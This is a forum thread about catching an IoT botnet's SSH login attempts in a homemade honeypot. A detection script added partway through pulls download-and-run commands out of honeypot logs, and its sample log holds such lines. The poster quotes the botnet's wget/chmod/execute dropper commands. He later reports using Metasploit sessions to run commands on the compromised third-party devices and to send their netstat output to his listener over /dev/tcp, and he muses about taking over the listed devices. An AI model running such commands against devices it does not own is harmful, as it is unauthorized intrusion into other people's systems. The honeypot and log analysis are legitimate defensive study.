i8igmac Posted July 31, 2017

Today I noticed my network was a little sluggish, so I checked the TCP stream out of habit. I see login attempts on my home router via SSH. So I quickly installed a light version of Ubuntu in VirtualBox and then installed a honeypot. I created a user list of root:x:500-worst-passwords for SSH. With some iptables kung fu I directed the attack to the honeypot, and boom, I see command execution while it's happening ;-) This is exciting...

The attack was coming from hundreds of IoT devices (webcams/routers/household appliances). When I saw the commands executed, I see:

wget http://Attack-ip-address/y808oe
chmod +x y808oe
./y808oe

So I downloaded a copy of the file for later research in hopes that it might be a 0day... One of my thoughts is that, with the list of IoT devices used, I too could gain access to these devices. I believe this is just an IoT device worm automated to get more devices. Anyone have experience or fun with honeypots?
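The wget / chmod +x / ./file sequence above is the part of a honeypot capture worth pulling out automatically: the download URL tells you which server is distributing the payload, and whether the same line also makes the file executable and runs it tells you the session was a real infection attempt rather than a scanner poking around. The script below is an added example, not the poster's code or any honeypot's own tooling. The log format it reads is an assumption (one line per command, as "<timestamp> <source-ip> CMD: <shell line>"), and the sample log is constructed for the example using documentation address ranges.

```python
"""Dropper-indicator extraction from honeypot command logs.

Added example; not from the original post. The log format is an assumption:
one line per command the attacker ran, as "<timestamp> <source-ip> CMD: <shell line>".
"""
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample, modelled on the wget / chmod +x / ./file sequence
# described in the post. Addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
2017-07-31T06:01:12Z 203.0.113.7 CMD: cd /tmp || cd /var/run; wget http://198.51.100.77/y808oe; chmod +x y808oe; ./y808oe
2017-07-31T06:01:40Z 198.51.100.23 CMD: cd /tmp; curl -O http://198.51.100.77/y808oe && chmod 777 y808oe && ./y808oe
2017-07-31T06:02:05Z 198.51.100.23 CMD: uname -a
2017-07-31T06:03:30Z 192.0.2.9 CMD: cd /tmp; tftp -g -r mips.bin 198.51.100.77; chmod +x mips.bin; ./mips.bin
"""

LINE_RE = re.compile(r"^(\S+) (\S+) CMD: (.*)$")
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s'\"]+")
# busybox-style "tftp -g -r <file> <host>", common on IoT droppers
TFTP_RE = re.compile(r"\btftp\b.*?-r\s+(\S+)\s+(\S+)")


def split_commands(cmdline):
    """Split a shell one-liner on ; && || and | into its individual commands."""
    parts = re.split(r"\s*(?:;|&&|\|\||\|)\s*", cmdline)
    return [p.strip() for p in parts if p.strip()]


def parse_fetch(cmd):
    """Return (url, host, filename) if this single command downloads a payload, else None."""
    m = URL_RE.search(cmd)
    if m:
        url = m.group(0)
        u = urlparse(url)
        return url, u.hostname, u.path.rsplit("/", 1)[-1]
    m = TFTP_RE.search(cmd)
    if m:
        fname, host = m.group(1), m.group(2)
        return "tftp://%s/%s" % (host, fname), host, fname
    return None


def extract_indicators(log_text):
    """One record per log line that fetches a payload, noting whether the
    attacker also marked it executable and ran it in the same line."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, cmdline = m.groups()
        cmds = split_commands(cmdline)
        fetch = next((f for f in map(parse_fetch, cmds) if f), None)
        if not fetch:
            continue
        url, host, fname = fetch
        chmod = any(c.split()[0] == "chmod" and fname in c.split() for c in cmds)
        executed = any(c.startswith("./" + fname) or c.split()[:2] == ["sh", fname]
                       for c in cmds)
        hits.append({"time": ts, "source": src, "url": url, "host": host,
                     "file": fname, "chmod": chmod, "executed": executed})
    return hits


def payload_hosts(hits):
    """Count which hosts serve the payloads: the distribution server(s) to report or block."""
    return Counter(h["host"] for h in hits)


if __name__ == "__main__":
    found = extract_indicators(SAMPLE_LOG)
    for h in found:
        print(h["time"], h["source"], "->", h["url"],
              "chmod" if h["chmod"] else "", "executed" if h["executed"] else "")
    print("payload servers:", dict(payload_hosts(found)))
```

Run it against a real capture by replacing SAMPLE_LOG with the honeypot's command log in the same shape. The three fetch forms handled (wget, curl, busybox tftp) are the ones IoT droppers typically use; anything else shows up as a line with no fetch and is simply skipped, so it is worth eyeballing the skipped lines occasionally for a new download method.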
Dave-ee Jones Posted July 31, 2017

So you used their hack to hack your own devices to gain better control of your own devices? That's when you know you were never in control of your own devices.. Sad boi.
i8igmac Posted July 31, 2017

Dave-ee Jones said: So you used their hack to hack your own devices to gain better control of your own devices? That's when you know you were never in control of your own devices.. Sad boi.

No. That was my mistake with the iptables rules. When I attempted to log into the attacker's SSH, my iptables rules would also forward me back to the VM... oops... None of my devices was hacked. I set up a honeypot and gave direct access in hopes of finding some private exploits.
digip Posted July 31, 2017

Be careful if/when they root the VM box and spread to your real network. When doing this, I'd be running the VM from a throwaway box as well, and the rest of your devices offline when the honeypot is on the network. If they escape the VM, they could possibly harm the host machine and the rest of the network.
Dave-ee Jones Posted July 31, 2017

digip said: Be careful if/when they root the VM box and spread to your real network. When doing this, I'd be running the VM from a throwaway box as well, and the rest of your devices offline when the honeypot is on the network. If they escape the VM, they could possibly harm the host machine and the rest of the network.

Yeah. Keep the VM's networking off and turn VirtualBox's network capabilities off for that VM; otherwise, as digip said, there will be issues..
i8igmac Posted July 31, 2017

I'm not so worried; it looks like the rootkit creates a reverse proxy. The honeypot fails to execute the rootkit, as per design.
Dave-ee Jones Posted July 31, 2017

i8igmac said: I'm not so worried; it looks like the rootkit creates a reverse proxy. The honeypot fails to execute the rootkit, as per design.

Yeah, well, you won't mind if we say "we told you so" if your whole network gets crypto'd or all your data is deleted or sent online then, will you? :P
i8igmac Posted July 31, 2017

Dave-ee Jones said: Yeah, well, you won't mind if we say "we told you so" if your whole network gets crypto'd or all your data is deleted or sent online then, will you? :P

Not worried; if you would like a shot, just ask. My router is a beast custom build. I'll make this pot a permanent setup.
Dave-ee Jones Posted August 1, 2017

i8igmac said: Not worried; if you would like a shot, just ask. My router is a beast custom build. I'll make this pot a permanent setup.

I'm actually trying to flash an RP-WD03 with OpenWRT :/ Having numerous problems, mainly I can't get it to talk to my TFTP server and request a kernel..
Forkish Posted August 1, 2017

i8igmac said: so I checked the TCP stream out of habit.

Wireshark?
i8igmac Posted August 2, 2017

Spoonish said: Wireshark?

I do most of everything from a command line... since my router runs Ubuntu, there is no shortage of tools. tcpick is a command-line tool that uses the same filtering as Wireshark.

tcpick -i wlp3s0 -C

This simply shows each TCP connection made as it happens. Then I ran the command below to see port 22 traffic with binary data.

tcpick -i wlp3s0 -yP -C 'dst port 22'

I wish I had recorded the whole process.
roy29 Posted August 2, 2017

i8igmac said: No. That was my mistake with the iptables rules. When I attempted to log into the attacker's SSH, my iptables rules would also forward me back to the VM... oops... None of my devices was hacked. I set up a honeypot and gave direct access in hopes of finding some private exploits.

Hello guys, how can I help???
Forkish Posted August 5, 2017

roy29 said: Hello guys, how can I help???

♪♫♪Roy is here to save the day!♪♫
i8igmac Posted October 26, 2017

Spoonish said: ♪♫♪Roy is here to save the day!♪♫

You could help in providing mind-bottling theories to solve this question... how do you get shells... The honeypot was fun, but here are the next steps I took in exploring this botnet that is attacking my Super-L33t-wifi-router. There have been questions around here about setting up Metasploit modules and configuring your exploits to set your reverse Meterpreter with a public IP... I have answered in this video. If anyone wants a demonstration of the steps I took in setting up the honeypot and the iptables rules used to redirect and monitor traffic, I could make a video.
i8igmac Posted October 27, 2017

I found the CnC... all of these devices are connected to the same identical IP... It's a VPN service... so I guess all that is left to do is contact the VPN service and submit the logs...

turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done

First I started a listener that greps for a specific IP... then I sent 2 commands off to all current sessions:

msf auxiliary(ssh_login) > sessions all -c 'netstat -nt > net'
msf auxiliary(ssh_login) > sessions all -c 'cat < net > /dev/tcp/turdsplash.ip/8888'

Then the results pour into my netcat listener:

turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done
tcp 0 0 192.168.1.130:42074 217.23.5.33:443 ESTABLISHED
tcp 0 0 192.168.1.130:44592 217.23.5.33:443 CLOSE_WAIT
tcp 0 0 192.168.10.101:40764 217.23.5.33:443 ESTABLISHED
tcp 0 0 192.168.10.102:47652 217.23.5.33:443 CLOSE_WAIT
tcp 0 0 192.168.1.4:55475 217.23.5.33:443 ESTABLISHED
tcp 0 0 192.168.1.4:39033 217.23.5.33:443 CLOSE_WAIT
tcp 0 0 192.168.1.103:47597 217.23.5.33:443 ESTABLISHED
tcp 0 0 192.168.1.103:56610 217.23.5.33:443 CLOSE_WAIT

I could turn this into a Metasploit module or resource script.
i8igmac Posted October 28, 2017

kdodge said: On some *nix you can run netstat with the -p option to get the process that is creating the connection. That might get you the backdoor that he is using. netstat -ntp

Yeah, it's a randomly generated application name.

217.23.5.33:443 ESTABLISHED agy46jk87
NanoCoder Posted February 10, 2018

Can you upload the entire file?
VirtualBoxVM Posted March 13, 2018

I've been receiving random TCP traffic from unknown IPs. I'm not sure if I should be worried or not. I'm nowhere near a pro at network security, but I'm learning every day. Should I try to protect myself? I hardly browse the internet and never attack anyone. So I'm confused about how I'm getting random TCP connections.
Dave-ee Jones Posted March 13, 2018

Is 217.23.5.33 the actual IP? If so, it probably means the hacker bought a server off of Worldstream (owner of the IP) and is using it to hack your network.
i8igmac Posted March 14, 2018

Dave-ee Jones said: Is 217.23.5.33 the actual IP? If so, it probably means the hacker bought a server off of Worldstream (owner of the IP) and is using it to hack your network.

Yeah. I emailed the admin. They responded appropriately, asking for detailed information on the attack, but I decided I want to keep my honeypot running, hoping to capture private exploits and log as many IPs as possible. The list is big. All easily exploitable.